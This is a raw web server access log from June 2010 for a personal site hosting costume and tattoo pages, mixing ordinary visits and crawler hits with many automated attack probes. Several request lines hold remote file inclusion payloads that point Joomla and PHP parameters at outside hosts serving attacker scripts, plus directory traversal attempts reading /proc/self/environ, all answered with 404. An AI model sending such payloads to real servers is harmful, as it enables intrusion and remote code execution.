66.246.72.178 - - [01/Jun/2010:21:27:09 -0500] "GET /logs/access_log.1272240000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:27:09 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:27:09 -0500] "GET /logs/access_log.1270598400/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:27:10 -0500] "GET /logs/access_log.1270598400/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:27:10 -0500] "GET /logs/access_log.1272240000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:27:56 -0500] "GET /logs/access_log.1273363200/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:28:07 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:28:18 -0500] "GET /logs/access_log.1273363200/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
64.151.192.11 - - [01/Jun/2010:21:30:17 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:21:30:17 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.145.89 - - [01/Jun/2010:21:31:03 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:21:31:03 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.151.192.11 - - [01/Jun/2010:21:31:07 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:21:31:08 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.44.82.61 - - [01/Jun/2010:21:31:21 -0500] "GET /logs/access_log.1274832000/administrator/components/com_myblog/config.myblog.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
62.44.82.61 - - [01/Jun/2010:21:31:21 -0500] "GET /administrator/components/com_myblog/config.myblog.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
62.44.82.61 - - [01/Jun/2010:21:31:21 -0500] "GET /logs/administrator/components/com_myblog/config.myblog.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
91.121.145.89 - - [01/Jun/2010:21:31:51 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.13.97 - - [01/Jun/2010:21:32:42 -0500] "GET /logs/access_log.1167436800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.145.89 - - [01/Jun/2010:21:32:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.46.13.97 - - [01/Jun/2010:21:32:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.145.89 - - [01/Jun/2010:21:32:46 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:21:32:47 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
74.125.16.66 - - [01/Jun/2010:21:34:23 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://www.ravensgard.org/gerekr/costume.html&rurl=translate.google.dk&usg=ALkJrhh2dRFDQt66X2xWtuokKkEGXR84jQ""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729),gzip(gfe) (via translate.google.com)"
83.93.17.30 - - [01/Jun/2010:21:34:24 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.dk&usg=ALkJrhieKCvAqL1r8idP6jyKNbCCPCBOVQ""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:34:24 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.dk&usg=ALkJrhieKCvAqL1r8idP6jyKNbCCPCBOVQ""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:34:25 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.dk&usg=ALkJrhieKCvAqL1r8idP6jyKNbCCPCBOVQ""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
74.125.16.66 - - [01/Jun/2010:21:34:29 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.dk&usg=ALkJrhieKCvAqL1r8idP6jyKNbCCPCBOVQ""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729),gzip(gfe) (via translate.google.com)"
64.151.192.11 - - [01/Jun/2010:21:34:32 -0500] "GET /logs/access_log.1274572800/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:21:34:32 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:21:34:32 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.125.16.66 - - [01/Jun/2010:21:34:34 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/costume2.htm&rurl=translate.google.dk&usg=ALkJrhgFAI_64tiQWrFnOepcD99ovekohw""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729),gzip(gfe) (via translate.google.com)"
74.125.16.66 - - [01/Jun/2010:21:35:28 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/index1.htm&rurl=translate.google.dk&usg=ALkJrhg4FoQkv2_YUnlvju81sjCxOIRebg""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729),gzip(gfe) (via translate.google.com)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:35:29 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
207.46.204.233 - - [01/Jun/2010:21:35:40 -0500] "GET /logs/access_log.1165449600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.107 - - [01/Jun/2010:21:35:43 -0500] "GET /!scanhttp://www.meiliana.com/meiliana/id.jpg?? HTTP/1.1" 404 328 "-""libwww-perl/5.831"
78.110.50.107 - - [01/Jun/2010:21:35:43 -0500] "GET /logs/!scanhttp://www.meiliana.com/meiliana/id.jpg?? HTTP/1.1" 404 333 "-""libwww-perl/5.831"
83.93.17.30 - - [01/Jun/2010:21:36:08 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
83.93.17.30 - - [01/Jun/2010:21:36:08 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.dk&usg=ALkJrhi2GzqkO-lVYZhD6E8Ly8DDAfB4OA""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
74.125.16.66 - - [01/Jun/2010:21:36:33 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://translate.googleusercontent.com/translate_c?hl=da&langpair=en%7Cda&u=http://tomdolan.pconline.com/costume/costume2.htm&rurl=translate.google.dk&usg=ALkJrhgFAI_64tiQWrFnOepcD99ovekohw""Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729),gzip(gfe) (via translate.google.com)"
64.151.192.11 - - [01/Jun/2010:21:36:35 -0500] "GET /logs/access_log.1274572800/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:21:36:36 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jun/2010:21:36:36 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [01/Jun/2010:21:36:51 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.145.89 - - [01/Jun/2010:21:36:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:21:36:51 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [01/Jun/2010:21:36:52 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
66.246.72.178 - - [01/Jun/2010:21:36:54 -0500] "GET //sources/template.php?CONFIG[main_path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:36:54 -0500] "GET /logs//sources/template.php?CONFIG[main_path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:36:54 -0500] "GET /logs/access_log.1271635200//sources/template.php?CONFIG[main_path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.110.50.107 - - [01/Jun/2010:21:37:16 -0500] "GET /!scanhttp://www.meiliana.com/meiliana/id.jpg?? HTTP/1.1" 404 328 "-""libwww-perl/5.831"
78.110.50.107 - - [01/Jun/2010:21:37:16 -0500] "GET /logs/!scanhttp://www.meiliana.com/meiliana/id.jpg?? HTTP/1.1" 404 333 "-""libwww-perl/5.831"
207.46.13.139 - - [01/Jun/2010:21:37:40 -0500] "GET /logs/access_log.1170720000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.246.72.178 - - [01/Jun/2010:21:38:00 -0500] "GET //sources/template.php?CONFIG[main_path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:38:01 -0500] "GET /logs/access_log.1271635200//sources/template.php?CONFIG[main_path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:38:01 -0500] "GET /logs//sources/template.php?CONFIG[main_path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.46.13.52 - - [01/Jun/2010:21:38:12 -0500] "GET /logs/access_log.1235606400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.199 - - [01/Jun/2010:21:40:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.48 - - [01/Jun/2010:21:47:57 -0500] "GET /logs/access_log.1208649600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.246.72.178 - - [01/Jun/2010:21:49:03 -0500] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:49:03 -0500] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:49:03 -0500] "GET /logs/access_log.1271548800//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:49:13 -0500] "GET /logs/access_log.1262563200//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.233.172.42 - - [01/Jun/2010:21:49:24 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
80.233.172.42 - - [01/Jun/2010:21:49:24 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
80.233.172.42 - - [01/Jun/2010:21:49:24 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
220.80.108.70 - - [01/Jun/2010:21:53:27 -0500] "GET /index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
220.80.108.70 - - [01/Jun/2010:21:53:27 -0500] "GET /logs/access_log.1271721600/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
220.80.108.70 - - [01/Jun/2010:21:53:28 -0500] "GET /logs/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:53:32 -0500] "GET /logs/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:53:32 -0500] "GET /index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:53:32 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:53:35 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:53:35 -0500] "GET /logs/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:53:38 -0500] "GET /index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:21:54:15 -0500] "GET /logs//com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.833"
121.88.4.141 - - [01/Jun/2010:21:54:33 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:21:54:51 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.199.38 - - [01/Jun/2010:21:55:10 -0500] "GET /logs/access_log.1240531200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [01/Jun/2010:21:55:55 -0500] "GET /logs/access_log.1271721600/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:56:12 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:56:12 -0500] "GET /logs/access_log.1271548800//components/com_facileforms/facileforms.frame.php?ff_compath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:21:56:12 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.135.55.205 - - [01/Jun/2010:21:57:21 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:21 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
